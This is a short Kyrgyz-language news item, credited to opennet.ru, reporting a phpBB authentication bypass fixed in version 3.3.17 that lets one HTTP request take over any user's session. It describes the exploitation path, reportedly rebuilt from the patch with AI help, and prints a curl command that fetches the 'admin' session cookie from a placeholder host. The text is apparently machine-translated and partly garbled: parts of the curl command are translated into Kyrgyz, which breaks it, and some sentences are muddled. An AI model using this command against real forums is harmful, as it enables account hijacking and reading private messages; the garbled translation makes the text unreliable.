Ачык булактуу форум кыймылдаткычы phpBBде алсыздык табылды. Бул алсыздык бир гана HTTP сурамына каалаган форум колдонуучусунун сессиясына туташууга мүмкүндүк берет. Алсыздык phpBB конфигурациясынын демейки версиясына таасир этет. Көйгөй phpBB 3.3.17 версиясында оңдолгон.
Кадимки колдонуучуларга кол салуу жеке билдирүүлөргө жетүү мүмкүнчүлүгүнө жана алардын атынан билдирүүлөрдү жөнөтүү мүмкүнчүлүгүнө алып келиши мүмкүн. Модераторлорго жана администраторлорго кол салуу башка адамдардын билдирүүлөрүн өчүрүүгө, көрүүгө алып келиши мүмкүн. IP даректери жана электрондук почта аркылуу кат алышуу, жеке кат алышууларды окуу, бирок сиз администратор интерфейсине кирип, хостко кире албайсыз.
Алсыздыктын чоо-жайы берилген эмес, бирок патчтын негизиндеги жасалма интеллектти колдонуу менен эксплуатациялоо ыкмасы буга чейин эле кайра түзүлгөн. Бул эксплуатациялоо ыкмасы "login_link" иштеткичин чакырат, аутентификациялоо ыкмасын "auth_provider=apache" кылып коёт жана кирүү ыкмасын Basic Auth аркылуу алмаштырат. Андан кийин PHP "PHP_AUTH_USER=login" чөйрө өзгөрмөсүн орнотот жана phpBB колдонуучунун кирүү маалыматын андан сырсөздү текшербестен чыгарып алат. Мисалы, "admin" колдонуучусунун сеанс идентификаторун алуу жана аны cookies.txt файлына сактоо үчүн, сиз төмөнкү кодду аткара аласыз:
curl -i -s \
-c кукилер.txt\
-b кукилер.txt\
-u 'администратор: каалаган нерсе' \
-d 'login=Login&login_username=admin&login_password=anything' \
'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'
Source: opennet.ru
